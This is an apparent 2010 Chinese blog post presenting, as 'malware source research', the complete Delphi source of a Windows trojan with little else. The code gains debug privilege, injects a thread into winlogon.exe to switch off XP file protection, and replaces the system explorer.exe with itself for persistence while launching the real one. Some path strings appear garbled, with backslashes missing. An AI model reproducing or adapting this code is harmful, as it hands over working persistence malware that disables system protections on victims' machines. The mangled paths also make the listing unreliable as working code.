十一月 18th, 2010

某恶意程序源码研究

应用程序研发解决方案, by 小哥.

program Project1;

uses
Windows,TlHelp32;

function LowerCase(const S: string): string; //转小写
var
Ch: Char;
L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <> 0 do
begin
Ch := Source^;
if (Ch >= ‘A’) and (Ch <= ‘Z’) then Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;

function CreatedMutexEx(MutexName: Pchar): Boolean;
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, MutexName);
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
//CloseHandle(MutexHandle);
Result := False;
Exit;
end;
end;
Result := True;
end;

function GetWinPath: string; //取WINDOWS目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>” then Result := Result + ”;
end;

function GetTempDirectory: string; //取临时目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetTempPath(MAX_PATH,Buf);
Result := Buf;
if Result[Length(Result)]<>” then Result := Result + ”;
end;

function EnableDebugPriv : Boolean; //提权为DEBUG
var
hToken : THANDLE;
tp : TTokenPrivileges;
rl : Cardinal;
begin
result := false;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, ‘SeDebugPrivilege’, tp.Privileges[0].Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;

procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
var
TID: LongWord;
hSfc,hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary(‘sfc_os.dll’);
pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;

procedure InitProcess(Name: string); //查找winlogon.exe进程PID
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;

const ExpFile = ‘explorer.exe’;
MasterMutex = ‘OpenSoul’;

var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
if not EnableDebugPriv then Exit; //提权失败退出
InitProcess(‘winlogon.exe’) ; //注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
s := ParamStr(0) ; //取本名
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
begin //如果不是
MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + ‘system32explorer.exe’),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ; //把自己复制到windows目录 为explorer.exe
end;
WinExec(PChar(GetWinPath + ‘system32explorer.exe’),1); //运行真正的explorer.exe
end.

Back Top